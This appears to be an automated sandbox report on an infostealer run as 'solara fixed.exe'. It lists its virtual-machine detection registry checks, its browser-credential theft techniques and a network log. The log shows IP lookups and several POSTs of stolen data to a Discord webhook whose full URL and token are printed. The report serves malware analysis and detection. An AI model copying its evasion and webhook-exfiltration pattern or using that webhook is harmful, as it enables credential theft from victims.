mercurialgrabber | c0cb117746fb41754067205ef04f88d9f51212825678a9761dd96604a0118bb2

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	solara fixed.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools	solara fixed.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	solara fixed.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com
24	discord.com
26	discord.com
27	discord.com
28	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip4.seeip.org
20	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	solara fixed.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	solara fixed.exe

Checks SCSI registry key(s) 3 TTPs 1 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S	solara fixed.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	solara fixed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	solara fixed.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	solara fixed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	solara fixed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	solara fixed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	solara fixed.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	solara fixed.exe

C:\Users\Admin\AppData\Local\Temp\solara fixed.exe
"C:\Users\Admin\AppData\Local\Temp\solara fixed.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2112

Network

DNS

ip4.seeip.org

solara fixed.exe

Remote address:

8.8.8.8:53

Request

ip4.seeip.org

IN A

Response

ip4.seeip.org

IN A

23.128.64.141
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1B80B22291F7662B3477A73190C66722; domain=.bing.com; expires=Mon, 03-Nov-2025 20:44:36 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 320E5DF0B9AE4B7E830E4910928C9C39 Ref B: LON601060101036 Ref C: 2024-10-09T20:44:36Z
date: Wed, 09 Oct 2024 20:44:35 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B80B22291F7662B3477A73190C66722

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=WyYHjxoNk8avCnbhNWE3ZVKt3vZo54P2_Euy10yulvg; domain=.bing.com; expires=Mon, 03-Nov-2025 20:44:36 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6C5D1303CB8946E99B3006852DA96701 Ref B: LON601060101036 Ref C: 2024-10-09T20:44:36Z
date: Wed, 09 Oct 2024 20:44:35 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B80B22291F7662B3477A73190C66722; MSPTC=WyYHjxoNk8avCnbhNWE3ZVKt3vZo54P2_Euy10yulvg

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AA807038297F441883D28E619C697D76 Ref B: LON601060101036 Ref C: 2024-10-09T20:44:36Z
date: Wed, 09 Oct 2024 20:44:35 GMT
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

solara fixed.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com//json/

solara fixed.exe

Remote address:

208.95.112.1:80

Request

GET //json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 09 Oct 2024 20:44:55 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 289
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

solara fixed.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 441
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Wed, 09 Oct 2024 20:44:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=5801d124867f11efaa79e2ccaf8c8638; Expires=Mon, 08-Oct-2029 20:44:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728506698
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGSHcZoH7Z5Rnc%2FEUCIH5lV%2FBAmA0Adsr2B%2Bo9n127Jh12I%2FNyVxdGq2fpznIOwtSFtXvqD2iYOs%2B%2BHW3z7SyOlLXsQQjJKDStvSkkZ4rA%2B%2FSgFFjoPvbqUjHi2Q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=5801d124867f11efaa79e2ccaf8c863820068ccba52c47c07d072da21bc7645c4105f9f7280029c016aaf48725883681; Expires=Mon, 08-Oct-2029 20:44:56 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=7caab455c531cb394a9ac7d9724a887eb3bcc906-1728506696; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=nXJ79spAkHioGgYJUzJy5ewFgmcC4PdSqPWya289hGM-1728506696771-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d013625ae1f71de-LHR
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 315
Expect: 100-continue

Response

HTTP/1.1 204 No Content

Date: Wed, 09 Oct 2024 20:44:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=583ebddc867f11efab6e2ac4500c0b7b; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1728506698
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obK2U6CrJg%2FrG2Kr7DTUxAWqeukIXxUVjeoPksD%2BzQUyou2khz5fPA7WZYSi1bCkSf7%2BSpWfAuQvALXLQfUGCTg1xXsySiiVeLb4Nk%2BM2jwQrZpgqwV92VV7OsZn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=583ebddc867f11efab6e2ac4500c0b7b45ba9d15c74fe0f88d714fd98e2ca63b8c7e6d752447f822e3cb354759da5bb8; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=76cfc6d0c273480e16e3c50ec48713583696a974-1728506697; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=pYDEGH3wFmJ.FQ_UhNnxXT3E4mkYXeFCNIjZh_Fsr_Q-1728506697168-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d013627ba07732c-LHR
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 748
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Wed, 09 Oct 2024 20:44:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=5889b12a867f11ef9ad2ce1e4b5e54fe; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1728506698
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16pSr0NeelB%2FSTZt7gpFwqGpX4iI8xbXYu2OtcXQPIvyfT9mnnFlnPmwAlVbRMM2Ij5JDcJrUE9pdCRPRgVBZqpFKgSmpaQiIhsynVPxsJwr%2B4pzH9TnwGcNaQNU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=5889b12a867f11ef9ad2ce1e4b5e54fe59e96b124d2d9e441e267d6e71d18e850ad7063b6b860ebd1ce754d1471e12d3; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=76cfc6d0c273480e16e3c50ec48713583696a974-1728506697; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ZaeQHmKC0ACIymkv5flQ6n4TRBdDLe69B5snIloBUa8-1728506697659-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d01362b3bca070e-LHR
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 196
Expect: 100-continue

Response

HTTP/1.1 204 No Content

Date: Wed, 09 Oct 2024 20:44:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=58bfc738867f11ef8291f6887ad7120e; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1728506699
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MAROPYf30z%2BWwjFyT2vNcxLgw2UaVdAecMjEB4rZwbUClXRCleKWqhbKyhFT85fJZxw333CgEjWhQbrcVcYjSdMH%2FM587HkMy%2BvS18HGRcE84OwfyAA3iIvUIRD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=58bfc738867f11ef8291f6887ad7120e5ddfb55eee803be1e7379a4dccdd4027559a734943368c4073c60277dd29d18d; Expires=Mon, 08-Oct-2029 20:44:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=87ec202803d1dfc9c28eca82f0af10d2f2e5c7a4-1728506698; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=v0t22kqLTytWZxv4cy6fj8OMUk65LmEARO3PvqniNbo-1728506698015-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d01362d388ccd1a-LHR
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: multipart/form-data; boundary=----------655ce428b81e4df2b266ffe96af04141
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
Host: discord.com
Content-Length: 662
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Wed, 09 Oct 2024 20:44:58 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=58fa3cb0867f11ef83b166f7753834c7; Expires=Mon, 08-Oct-2029 20:44:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1728506699
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNFE%2BsTK8BHNFqSM2BTQFk3qoyeJOPZ3fKa1HGUQ1BEo3jcmSJhlnX7nJilpjJta6kyJkG6O241opZBWS9uFfL%2BnWNIgZEi5hXYsSIBYqYshT98HvosFOrJeYvxt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=58fa3cb0867f11ef83b166f7753834c745e918df6ee01d50c9e5ffd33b0a9ba8bd1d2314ed6a5636c5ccfc8a66cf5293; Expires=Mon, 08-Oct-2029 20:44:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=e49eb9060733e77526133e2d6898f7bcfde52768-1728506698; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=UwF2VJE2qcsBJsb4_GaVwuhERPaIZZ5GXvx.rNc92VU-1728506698398-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d01362f8c5563e3-LHR
POST

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

solara fixed.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG HTTP/1.1
Content-Type: application/json
Host: discord.com
Content-Length: 307
Expect: 100-continue

Response

HTTP/1.1 204 No Content

Date: Wed, 09 Oct 2024 20:44:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=591da272867f11ef8f8f8a150b92bd8d; Expires=Mon, 08-Oct-2029 20:44:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1728506700
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SsdDCB%2Bkl0CCIu7E5dprZMeamXWWkwrJlRF%2BuQ11BL%2Fk3kUCequ%2FudEVEa7YwcKFBR%2Fyo7IMM%2Brom0ft4gqi6V5HyLyiYxN8k98zIC%2BUUqyw4qVKotR2vUfeQLcN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=591da272867f11ef8f8f8a150b92bd8d88852803bda40219aa27a5dc891796ca7e22863f141f16a99b7391cbc1108d17; Expires=Mon, 08-Oct-2029 20:44:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=87ec202803d1dfc9c28eca82f0af10d2f2e5c7a4-1728506698; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=RzGDWIkeC5MRC9l8kf2BjQ8CMyrqrryukB.ZEj7Ayjo-1728506698631-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d0136314e7863e3-LHR
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

66.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

66.209.201.84.in-addr.arpa

IN PTR

Response
DNS

134.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.190.18.2.in-addr.arpa

IN PTR

Response

134.190.18.2.in-addr.arpa

IN PTR

a2-18-190-134deploystaticakamaitechnologiescom
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response

23.128.64.141:443

ip4.seeip.org

solara fixed.exe

260 B
5
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

tls, http2

2.0kB
9.3kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=148f84e3f30a477fad4da7c44bb0e357&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204
208.95.112.1:80

http://ip-api.com//json/

http

solara fixed.exe

296 B
598 B
5
3

HTTP Request

GET http://ip-api.com//json/

HTTP Response

200
162.159.136.232:443

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

tls, http

solara fixed.exe

1.4kB
5.1kB
10
11

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

204
162.159.136.232:443

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

tls, http

solara fixed.exe

1.4kB
2.1kB
8
8

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

204
162.159.136.232:443

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

tls, http

solara fixed.exe

1.8kB
2.1kB
7
8

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

204
162.159.136.232:443

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

tls, http

solara fixed.exe

1.3kB
2.2kB
8
9

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

204
162.159.136.232:443

https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

tls, http

solara fixed.exe

2.6kB
5.2kB
11
15

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

200

HTTP Request

POST https://discord.com/api/webhooks/1293675192106877011/uBYdl54QTqHJ58vFoe-OKreDxwD-f3D8N0iSVRM5Z9ASoc5jOxeIG-rwdBs7sGK59emG

HTTP Response

204

8.8.8.8:53

ip4.seeip.org

dns

solara fixed.exe

59 B
75 B
1
1

DNS Request

ip4.seeip.org

DNS Response

23.128.64.141
8.8.8.8:53

